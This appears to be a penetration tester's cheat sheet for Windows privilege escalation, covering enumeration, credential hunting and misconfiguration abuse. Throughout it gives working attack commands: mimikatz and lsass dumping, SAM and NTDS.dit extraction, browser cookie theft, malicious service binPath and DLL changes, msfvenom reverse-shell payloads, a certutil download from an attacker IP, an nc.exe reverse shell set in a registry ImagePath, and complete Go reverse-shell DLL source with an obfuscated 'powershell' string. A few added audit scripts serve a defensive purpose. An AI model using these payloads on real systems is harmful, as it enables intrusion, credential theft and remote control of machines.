Windows Privilege Escalation
General and useful shortlist of commands
powershell -ex bypass
add user
net user /add username password
add user to group
net localgroup groupname /add user
net group "Exchange Windows Permissions" svc-alfresco /add /domain
Enable RDP (needs administrator)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable firewall
netsh advfirewall set allprofiles state off
Enable only remote desktop
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Using nxc
netexec smb $IP -u administrator -p pass123 -M rdp -o ACTION=enable
Check permission on file or dir
cacls .
icacls .
Share a folder over SMB (on the attacker machine)
impacket-smbserver -smb2support sharename /path/to/folder
Run as another user
runas /user:domain\samaccountname cmd.exe
Sharing a folder using the directory properties dialog -> https://youtu.be/jBfdlLybMek?si=qd9bu1ch_VPBO4Cm&t=8408
Initial Enumeration
User and Groups Enumeration
Logged-In user
query user
Current User
echo %USERNAME%
Privileges
whoami /priv
whoami /all
Groups Information
whoami /groups
All User on local machine
net user
net user /domain
All groups
net localgroup
Details about a user
net user samname
net user samname /domain
Details about a group
net localgroup administrators
Password policy
net accounts
Local User Description
Get-LocalUser
Computer Description
Get-WmiObject -Class Win32_OperatingSystem | select Description
OS and Process Enumeration
Info About OS
Get-WmiObject Win32_OperatingSystem | select -Property *
Running processes
tasklist /svc
Env variables
set
Systeminfo
systeminfo
Patches and Updates
wmic qfe
Get-HotFix | ft -AutoSize
Installed programs
wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version
Get-CimInstance -ClassName Win32_Product
Running Programs
Get-WmiObject Win32_Process | Format-List *
Running processes and their owner (does not always work)
# other solution
Get-WmiObject Win32_Process | ForEach-Object {
$process = $_
$owner = $process.GetOwner()
[PSCustomObject]@{
ProcessName = $process.Name
ProcessId = $process.ProcessId
User = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { "N/A" }
}
} | Format-Table -AutoSize
# other solution
Get-CimInstance Win32_Process | ForEach-Object {
$process = $_
$owner = Invoke-CimMethod -MethodName GetOwner -InputObject $process
Write-Host $process.name $owner
}
# other solution
$owners = @{}
gwmi win32_process |% {try {$owners[$_.handle] = $_.getowner().user} catch{} }
(get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}})
Get processes that have a main window (displayed)
gps | ? { $_.MainWindowTitle }
Running processes with open ports
netstat -ano
Get all services
Get-CimInstance -ClassName Win32_service
sc query
sc query state= all | findstr "SERVICE_NAME"
Get info about services
Get-Service "ServiceName"
Get all scheduled tasks
schtasks /query /fo LIST /v
Enumerate installed programs
wmic product get name
Enumerate local ports
netstat -ano | findstr 6064
Enumerate a process by ID
get-process -Id 3324
gps -Id 3324
Enumerate running services
get-service | ? {$_.DisplayName -like 'Druva*'}
Get-CimInstance Win32_Service | Format-List *
Modifying PowerShell Execution Policy
Set-ExecutionPolicy Bypass -Scope Process
Installed programs without needing elevated permissions (works over WinRM)
Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Search program by name
Get-CimInstance -ClassName Win32_Product | Where-Object { $_.Name -like "*name*" } | Select-Object Name, Version
Process Monitor
procmon from powershell
# Poor man's procmon: snapshot the process command lines every second and print the difference
while ($true) {
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2 -Property CommandLine
}
sysinternals
Procmon.exe
How to use procmon from the command line
procmon.exe /Minimized /Quiet /Backingfile C:\Logs\procmon.pml
Start-Sleep -Seconds 10
procmon.exe /Terminate
procmon.exe /OpenLog C:\Logs\procmon.pml /SaveAs C:\Logs\procmon.csv /SaveFilter /Minimized
Enumerate all processes and services and also print the account they run as
# Function to get the owner of a process (match the WMI object by PID; System.Diagnostics.Process.Handle is a native handle, not the PID)
function Get-ProcessOwner {
    param (
        [System.Diagnostics.Process]$Process
    )
    try {
        $wmiProcess = Get-WmiObject Win32_Process -Filter "ProcessId = $($Process.Id)"
        $owner = $wmiProcess.GetOwner()
        if ($owner.ReturnValue -eq 0) { return "$($owner.Domain)\$($owner.User)" }
        return "N/A"
    } catch {
        return "N/A"
    }
}
# Enumerate all processes
Write-Host "Processes:"
Get-Process | ForEach-Object {
    $owner = Get-ProcessOwner $_
    Write-Host "Process: $($_.Name) - ProcessId: $($_.Id) - Owner: $owner"
}
# Function to get the account a service runs as and its PID
# (Win32_Service has no GetOwner() method; StartName and ProcessId carry that information)
function Get-ServiceRunInfo {
    param (
        [string]$ServiceName
    )
    try {
        $service = Get-WmiObject Win32_Service -Filter "Name = '$ServiceName'"
        return [PSCustomObject]@{ Owner = $service.StartName; ProcessId = $service.ProcessId }
    } catch {
        return [PSCustomObject]@{ Owner = "N/A"; ProcessId = 0 }
    }
}
# Enumerate all services (Get-Service objects have no Id property; the PID comes from WMI)
Write-Host "`nServices:"
Get-Service | ForEach-Object {
    $info = Get-ServiceRunInfo $_.Name
    Write-Host "Service: $($_.Name) - ProcessId: $($info.ProcessId) - RunsAs: $($info.Owner)"
}
Network
Get Info About IP and network card
ipconfig /all
ARP Table:
arp -a
Routing table
route print
Enumeration Protection
Windows Defender
Get-MpComputerStatus
AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test AppLocker
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Disable real-time monitoring (needs administrator)
Set-MpPreference -DisableRealtimeMonitoring $true
Named Pipe
Searching File & Creds
Searching File
tree /f /a
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
Find file
dir /s/b filename
dir /s/b \filename (starting from the drive root, searches the whole drive)
dir /s/b *.log
dir /s/b *.txt
dir /s/b *.doc*
dir /s/b *.zip
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Print only the matching file names (/M):
findstr /SI /M "password" *.xml *.ini *.txt
Search file content CMD:
findstr /si password *.xml *.ini *.txt *.config
Search file content PowerShell
select-string -Path <path>*.txt -Pattern password
Search file extension CMD
where /R C:\ *.config
Search file extension PowerShell
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Interesting File/Directories
Extract passwords from a file
gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Interesting file
Unattend.xml
Sticky notes
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
PowerShell history
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Powershell Command
Get-Credential API
Import-Clixml
Export-Clixml
runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Saved Credentials List
cmdkey /list
Execute SharpChrome for extracting data from DPAPI - https://github.com/GhostPack/SharpDPAPI/blob/master/README.md
SharpChrome.exe logins /unprotect
Password Manager
KeePass -> .kdbx -> keepass2john -> hashcat/john
Mail
MailSniper
Lazagne - https://github.com/AlessandroZ/LaZagne - Credentials recovery project
lazagne.exe all
SessionGopher
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
Clear-Text Password in the Registry
Windows Autologon - enabled if AutoAdminLogon is 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Putty session file
Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
Wifi Password
netsh wlan show profile
netsh wlan show profile name="Wifi" key=clear
VHDX/VMDK
Mount Linux
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
Windows -> Mount-VHD
Resources -> Extract VMDK
Misconfiguration
AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
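The following is an added example, not part of the original notes, that checks the two registry misconfigurations covered above (Winlogon autologon with a stored DefaultPassword, and AlwaysInstallElevated) and reports findings without echoing any secret. The function names and output fields are my own choices; the registry paths and value names are the documented Windows ones.

```powershell
# Added example (not from the original notes). Function names and output fields are assumptions;
# registry paths and value names are the documented Windows ones.

function Test-AutoLogon {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    $enabled = ($p.AutoAdminLogon -eq '1')
    # DefaultPassword is a plain REG_SZ that every local user can read; report only its presence.
    $cleartext = [bool]$p.DefaultPassword
    $finding = 'OK'
    if ($enabled)   { $finding = 'Autologon enabled; password should live in the LSA DefaultPassword secret, not in the registry value' }
    if ($cleartext) { $finding = 'Cleartext DefaultPassword under Winlogon: readable by every local user, remove the value' }
    [PSCustomObject]@{
        AutoAdminLogon    = $enabled
        DefaultUserName   = $p.DefaultUserName
        DefaultDomainName = $p.DefaultDomainName
        CleartextPassword = $cleartext
        Finding           = $finding
    }
}

function Test-AlwaysInstallElevated {
    $policy = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty -Path "HKLM:\$policy" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty -Path "HKCU:\$policy" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    # Windows Installer honours the policy only when BOTH the machine and the user value are 1.
    $exploitable = (($hklm -eq 1) -and ($hkcu -eq 1))
    $finding = 'OK'
    if ($exploitable) { $finding = 'Any user can install an MSI as SYSTEM: set both values to 0 or remove them' }
    [PSCustomObject]@{
        HKLM        = $hklm
        HKCU        = $hkcu
        Exploitable = $exploitable
        Finding     = $finding
    }
}

Test-AutoLogon | Format-List
Test-AlwaysInstallElevated | Format-List
```

Run it as a standard user; both keys are world-readable, so a non-empty `CleartextPassword` or `Exploitable = True` is the finding a local attacker would also see. The remediation is the one in the Finding column: delete the DefaultPassword value (or reconfigure autologon so the password is stored as an LSA secret) and set AlwaysInstallElevated to 0 in both hives via Group Policy.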
Exploit
Import-Module .\PowerUp.ps1
Write-UserAddMSI
Generating MSI
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
Execute MSI
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
BypassUAC - user account control
Bypass-UAC
Share with write permission
SCF on a File Share
Icon on attacker machine UNC
IconFile=\\10.10.14.3\share\legit.ico
Starting
Responder
/Inveigh
/InveighZero
Cracking using
hashcat -m 5600
Malicious lnk file - LnkBomb
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Pillaging
Enumerate Installed applications
dir "C:\Program Files"
Using Registry Key
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
Enumerate Installed services
Websites
File Shares
Databases
Directory Services (such as Active Directory, Azure AD, etc.)
Name Servers
Deployment Services
Certificate Authority
Source Code Management Server
Virtualization
Messaging
Monitoring and Logging Systems
Backups
Sensitive Data
Keylogging
Clipboard - Invoke-Clipboard
Screen Capture
Network Traffic Capture
Previous Audit reports
User Information
History files, interesting documents (.doc/x,.xls/x,password/.pass, etc)
Roles and Privileges
Web Browsers
Firefox
%APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
CookieExtractor
Chrome
SharpChromium
Fix copy for Invoke-SharpChromium
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Invoke-SharpChromium
IM Clients
Slack/Teams
If we have Administrator privileges, we can run mimikatz
Run mimikatz
mimikatz.exe
privilege::debug
log
sekurlsa::logonpasswords
Windows User Privileges
SeImpersonate and SeAssignPrimaryToken
SeDebugPrivilege
Using procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Get SYSTEM by spawning a child of a SYSTEM process
Get info about winlogon
tasklist
# PID of winlogon or lsass
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe", "")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe", "")
SeTakeOwnershipPrivilege
Import-Module .\Enable-Privilege.ps1
https://github.com/fashionproof/EnableAllTokenPrivs
.\EnableAllTokenPrivs.ps1
Choosing Target File
Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
Checking File Ownership
cmd /c dir /q 'C:\\Department Shares\\Private\\IT'
Take Ownership
takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'
Modify FILE ACL
icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F
Windows Groups Privileges
Backup Operators
Enable the SeBackupPrivilege flag - https://github.com/giuliano108/SeBackupPrivilege
Resources -> Exploit
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Start backup
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Save the SYSTEM hive
reg save HKLM\SYSTEM SYSTEM.SAV
reg save hklm\system C:\temp\system.hive
Save the SAM hive
reg save HKLM\SAM SAM.SAV
reg save hklm\sam C:\temp\sam.hive
Extracting with impacket
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Extracting Cred from NTDS.dit
Install-Module DSInternals -Force
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM # or SYSTEM.SAV, depending on how we saved it earlier
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
Extracting
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
Create a copy
robocopy /B E:\Windows\\NTDS .\ntds ntds.dit
Event Log Readers
net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
DnsAdmins
Generate malicious dll
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Get info about group DNSAdmins
Get-ADGroupMember -Identity DnsAdmins
Change dll
dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
Restart the DNS service (could be disruptive)
sc stop DNS
sc start DNS
Get SID user
wmic useraccount where name="netadm" get sid
Check permissions on the DNS service
sc.exe sdshow DNS
Hyper-V Administrators
Print Operators - SeLoadDriverPrivilege
whoami /priv
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Capcom.sys - Add Reference Driver
reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"
Enable privileges
EnableSeLoadDriverPrivilege.exe
Verify the driver is loaded
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
Use ExploitCapcom
.\ExploitCapcom.exe
Use EoPLoadDriver
Clean up
reg delete HKCU\\System\\CurrentControlSet\\Capcom
Server Operators
Find services that run as SYSTEM, e.g., AppReadiness
sc qc AppReadiness
Check permissions with PsService
c:\Tools\PsService.exe security AppReadiness
Change binPath
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start Service
sc start AppReadiness
User Account Control
Checking if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Checking UAC Level
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
Checking Windows Version
[environment]::OSVersion.Version
Reviewing PATH
cmd /c echo %PATH%
UAC bypass
UACME
UAC bypass by mocking trusted directories - uac-bypass-by-mocking-trusted-directories
Bypass-UAC
Weak Permission
Permissive File System ACLs
Using Sharphound.exe audit to search for modifiable services, e.g., SecurityService
Check permissions
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Change executable
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Restart the service
sc start SecurityService
Weak Service Permissions
Run
Sharphound.exe audit
Using accesschk to review permissions on services
accesschk.exe /accepteula -quvcw WindscribeService
Query all services
sc query
Change binpath
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
Stop service
sc stop WindscribeService
Restart
sc start WindscribeService
Reverting to initial state
sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"
sc start WindScribeService
If we have shutdown permission and the service is set to autorun
shutdown -r -t 1
Unquoted Services
Querying service
sc qc SystemExplorerHelpService
Searching unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Scheduled Task
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v /TN "Name"
Get-ScheduledTask | select TaskName,State
Permissive Registry ACLs
Checking Weak Service ACLs in Registry
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Changing ImagePath with PowerShell
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
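The following is an added example, not part of the original notes, that runs the three checks from the Permissive File System ACLs, Unquoted Services and Permissive Registry ACLs sections in one pass over every Win32 service: an unquoted ImagePath containing a space, a service binary writable by low-privileged principals, and a service registry key writable by low-privileged principals. The function names, the `$WeakPrincipals` list and the output columns are my own choices; only Windows built-in cmdlets are used.

```powershell
# Added example (not from the original notes). Function names, $WeakPrincipals and the output
# shape are assumptions of this example.

# Principals that must never hold write-capable rights on a service binary or its registry key.
$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName includes arguments; return just the executable.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }   # quoted: take the quoted part
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }  # unquoted: up to the first .exe
    return $PathName
}

function Test-WeakAcl {
    param([string]$LiteralPath)
    # Returns the weak principals that hold an Allow ACE with a write-capable right on a file
    # or registry key. Numeric generic rights are not decoded: treat the result as a first pass
    # and confirm with icacls / accesschk.
    $acl = Get-Acl -LiteralPath $LiteralPath -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights = if ($ace.PSObject.Properties['FileSystemRights']) { "$($ace.FileSystemRights)" } else { "$($ace.RegistryRights)" }
        if ($rights -match 'FullControl|Modify|Write|ChangePermissions|TakeOwnership|CreateFiles|AppendData|SetValue|CreateSubKey|Delete') {
            $ace.IdentityReference.Value
        }
    }
    @($hits | Sort-Object -Unique)
}

function Invoke-ServiceAudit {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }   # skip entries without an image path
        $bin = Get-ServiceBinaryPath $svc.PathName
        # Unquoted paths under %SystemRoot% are harmless (admin-only directories), same filter as the wmic one-liner.
        $unquoted = ($svc.PathName -notmatch '^"') -and ($bin -match ' ') -and ($bin -notlike "$env:SystemRoot\*")
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        [PSCustomObject]@{
            Name             = $svc.Name
            StartMode        = $svc.StartMode
            RunsAs           = $svc.StartName
            BinaryPath       = $bin
            UnquotedPath     = $unquoted
            BinaryWritableBy = (Test-WeakAcl $bin) -join ', '
            KeyWritableBy    = (Test-WeakAcl $key) -join ', '
        }
    } | Where-Object { $_.UnquotedPath -or $_.BinaryWritableBy -or $_.KeyWritableBy }
}

Invoke-ServiceAudit | Format-Table -AutoSize
```

Only services with at least one finding are printed. Each column maps to a fix: quote the path (`sc config <name> binPath= "\"C:\Program Files\Vendor\svc.exe\""`), remove the write ACEs from the binary with `icacls <file> /remove <principal>`, and tighten the key's ACL in regedit or with `Set-Acl`. The script does not inspect the service object's own DACL (what `sc sdshow` and `accesschk -c` report), so keep the accesschk step from the Weak Service Permissions section for that case.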
Modifiable Registry Autorun Binary
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/LogonAutostartExecutionRegistryRunKeys.md
Kernel Exploit
List vuln windows: https://msrc.microsoft.com/update-guide/vulnerability
wmic qfe list brief
LOLBAS
Collection
LOLBAS - LOLBAS
Transfer file
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
Encoding a file
certutil -encode file1 encodedfile
Decoding a file
Certutil -decode encodedfile file2
Execute dll
rundll32.exe file.dll,methodName
DLL Injection/Hijacking
DLL injection is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.
Execute an arbitrary DLL inside another process:
Locate the process to inject the DLL into: CreateToolhelp32Snapshot, Process32First, Process32Next
Open the process: GetModuleHandle, GetProcAddress, OpenProcess
Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory
Create a thread in the process that will load the DLL: CreateRemoteThread, LoadLibrary
Other functions to use: NtCreateThreadEx, RtlCreateUserThread
LoadLibrary
Manual Mapping
Manual Mapping
Resources
DLL Injection Hacktips - DLL Injection
IredTeam DLL Injection - IredTeam-DLL Injection
DLL Hijacking
DLL Hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.
DLL Replacement: replace a legitimate DLL with an evil DLL. Often combined with DLL Proxying.
DLL Search Order Hijacking: hijacking the search order takes place by putting the evil DLL in a location that is searched before the actual DLL. [Ref.]
Phantom DLL hijacking: drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.
DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or via .exe.manifest / .exe.local files. [Ref.]
WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often called DLL side-loading. [Ref.]
Relative path DLL Hijacking: copy the legitimate application to a user-writable folder, alongside the evil DLL.
Find Missing DLL
procmon -> Filter -> "Result" contains "NOT FOUND" and "Path" ends with ".dll"
To escalate privileges
Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
Ensure write access is available for any directory in which the DLL will be searched for
icacls "Path-To-Dir"
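The following is an added example, not part of the original notes, that walks the directories the DLL search order consults for a given application (the application directory, System32, System, the Windows directory, the current directory and each %PATH% entry, in that order) and reports which ones the current user can actually write to. Instead of parsing ACEs it performs a real probe (create and delete an empty file), so it reflects effective rights. The function names are my own and `$AppDir` is a placeholder for the application under review.

```powershell
# Added example (not from the original notes). Function names are assumptions; the default
# $AppDir value is a placeholder, not a real application path.

function Test-DirectoryWritable {
    param([string]$Directory)
    # Effective-rights probe: try to create and remove an empty file with a unique name.
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ("dllaudit-" + [guid]::NewGuid().ToString('N') + ".tmp")
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-DllSearchDirectories {
    param([string]$AppDir)
    # Standard search order with SafeDllSearchMode enabled (the default).
    $dirs = @(
        $AppDir,
        "$env:SystemRoot\System32",
        "$env:SystemRoot\System",
        $env:SystemRoot,
        (Get-Location).Path
    )
    $dirs += ($env:Path -split ';' | Where-Object { $_ })
    # Preserve the order (it is the search order) but drop duplicates and empty entries.
    $seen = @{}
    foreach ($d in $dirs) {
        $norm = $d.TrimEnd('\').ToLowerInvariant()
        if ($norm -and -not $seen.ContainsKey($norm)) {
            $seen[$norm] = $true
            $d
        }
    }
}

function Invoke-DllSearchOrderAudit {
    param([string]$AppDir = 'C:\Program Files\ExampleApp')   # placeholder
    Get-DllSearchDirectories -AppDir $AppDir | ForEach-Object {
        [PSCustomObject]@{
            Directory = $_
            Exists    = (Test-Path -LiteralPath $_ -PathType Container)
            Writable  = (Test-DirectoryWritable $_)
        }
    }
}

Invoke-DllSearchOrderAudit | Format-Table -AutoSize
```

Run it from a non-elevated prompt as the account whose rights you care about; an elevated shell can write almost everywhere and the result is meaningless. Any row with `Writable = True` that precedes the directory holding the real DLL is a hijack location, and a PATH entry with `Exists = False` deserves a look too, because whoever can create that directory inherits the same position in the search order. The fix is to remove user-writable directories from the system PATH or tighten their ACLs, and to ship DLLs next to the executable so the application directory wins the search.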
Tools
winpeas
Siofra
PowerSploit: Find-ProcessDLLHijack, Find-PathDLLHijack, Write-HijackDll
Resources
DLL Hijacking Hacktricks
DLL Hijacking PrivEsc
hijacking-dlls-in-windows
tcapt-dll-hijacking
DLL Hijacking
DLL Reflective
Resources
Reflective DLL Injection
DLL SideLoading
Resources
dll-sideloading-proxying
DLL Proxying
Basically, a DLL proxy is a DLL capable of executing your malicious code when loaded, while still exposing the real library's exports and working as expected by relaying all the calls to the real library.
Get RevShell (N.B. the architecture used is very important)
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll
msfconsole
->use multi/handler
Write Code
How to compile the DLL
x64
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
x86
i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
Link to Windows Sockets 2 (ws2_32), necessary for the rev shell
i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
Alternatively, use Visual Studio and C#
Using go:
package main

import (
	"C"
	"net"
	"os/exec"
)

//export VerifyThemeVersion
func VerifyThemeVersion() {
	main()
}

func main() {
	dst := "192.168.1.152" // set ip
	pnum := "9999"         // set port
	connstring := dst + ":" + pnum
	prot := "tcp"
	netData, _ := net.Dial(prot, connstring)
	shell := exec.Command("pow" + "er" + "she" + "ll.e" + "xe")
	shell.Stdin = netData
	shell.Stdout = netData
	shell.Stderr = netData
	shell.Run()
}
# x86
GOOS=windows GOARCH=386 CGO_ENABLED=1 CC=i686-w64-mingw32-gcc go build -buildmode=c-shared -o main.dll reverse_shell.go
# amd64
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o evil.dll ./calculator.go
How to check if the DLL works
rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll
rundll32.exe injection.dll,0
Tools
Procmon
Process Explorer
VisualStudio
Resources
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/tree/master